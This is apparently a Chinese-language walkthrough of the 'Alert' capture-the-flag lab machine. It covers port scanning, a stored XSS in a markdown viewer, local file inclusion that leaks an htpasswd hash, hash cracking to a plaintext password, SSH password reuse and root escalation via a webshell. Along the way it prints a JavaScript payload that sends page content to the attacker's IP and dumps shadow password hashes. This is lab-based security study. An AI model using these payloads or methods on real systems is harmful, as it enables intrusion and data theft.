基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.44
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-26 13:28 CST
Nmap scan report for 10.10.11.44
Host is up (0.078s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.11 seconds

80

需要加hosts:

1
10.10.11.44 alert.htb

在线查看markdown的:

Markdown Viewer

markdown文件有分享功能,另外Contact那里尝试输入url会有自动访问:

xss

所以很容易想到XSS,markdown文件中xss,分享功能的url发给bot

现在一切都未知,所以首先让bot访问应用首页,把响应内容发给我们:

在其中发现我们的面板上没有的messages:

1
<a href="index.php?page=messages">Messages</a>

所以再次xss去访问messages,得到新的file

1
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

这里很明显lfi:

LFI

接下来就是LFI读文件部分了,因为是Apache,所以先读配置文件:

1
/etc/apache2/sites-enabled/000-default.conf

在其中发现htpasswd文件路径:

继续读htpasswd文件:

1
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

得到的hash可以破解出密码:

1
2
3
sudo hashcat -m 1600 hash.txt ~/Tools/dict/rockyou.txt

manchesterunited

xss.md

1
2
3
4
5
6
7
8
9
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://alert.htb/', false);
xhr.withCredentials = true;
xhr.send();
var exfil = new XMLHttpRequest();
exfil.open("GET", "http://10.10.14.7:7777/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
</script>

user flag

albert密码复用,可以直接登录ssh:

提权信息

查看端口可以发现本地的8080,查看进程可以发现是root启动的php原生server:

1
2
3
4
5
6
7
albert@alert:~$ ss -tunlp

tcp    LISTEN  0       4096         127.0.0.1:8080        0.0.0.0:*

albert@alert:~$ ps aux

root        1001  0.0  0.6 206768 24292 ?        Ss   01:50   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

查看权限可以发现我们对website-monitor的config目录有权限,我们可以向其中写入文件:

提权 & root flag

所以就是写入webshell后访问触发即可

shadow

1
2
3
root:$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/:19791:0:99999:7:::
albert:$6$ITP6P5Et1oVKsi7t$kEwgQPb4LUVcYb9MDHklHWKwDPvE6l7TGBUZogMvPoHUDt2IZ0ONlWODbsiTFdwd7SkYUNHGA0QS.Bnd6/tsp0:19822:0:99999:7:::
david:$6$oYlviwCQ3SMghmp.$95V3x9QjaD5GU8yoFsb8ufq9GrJ7PtcMAilTYtiNN2RZsVG0qgiWXUdlDURqdE84Nk2T11F4BpJXz3FbEK3bC1:20008:0:99999:7:::

参考资料